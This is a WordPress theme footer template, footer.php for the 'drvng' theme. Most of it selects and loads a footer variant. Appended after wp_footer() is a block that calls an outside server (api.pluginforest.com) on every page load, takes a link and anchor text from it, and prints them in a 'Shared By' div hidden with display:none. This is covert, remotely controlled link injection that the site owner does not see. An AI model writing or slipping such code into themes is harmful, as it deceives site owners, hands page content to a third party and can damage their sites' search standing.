<?php

/**
 * Footer file
 *
 * @package drvng
 */

?>

<?php
		if ( is_singular() && function_exists( 'carbon_get_the_post_meta' ) ) {
			if ( ( 'global' === carbon_get_the_post_meta( 'drvng_single_footer' ) )  || ( ! carbon_get_the_post_meta( 'drvng_single_footer' ) ) ) {
				$drvng_footer = get_theme_mod( 'global_footer_style', 'footer-style-one' );
			} elseif ( ( carbon_get_the_post_meta( 'drvng_single_footer' ) ) && ( 'global' !== carbon_get_the_post_meta( 'drvng_single_footer' ) ) ) {
				$drvng_footer = carbon_get_the_post_meta( 'drvng_single_footer' );
			}
		} else {
			$drvng_footer = get_theme_mod( 'global_footer_style', 'footer-style-one' );
		}

		if ( $drvng_footer == 'footer-style-one') {
			get_template_part( 'components/footer/footer_v1' );
		}
		elseif ( $drvng_footer == 'footer-style-two'  ) {
			get_template_part( 'components/footer/footer_v2' );
		} 
		else {
			get_template_part( 'components/footer/footer_v1' );
		}

?>

</div>
<!--End pagewrapper-->
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>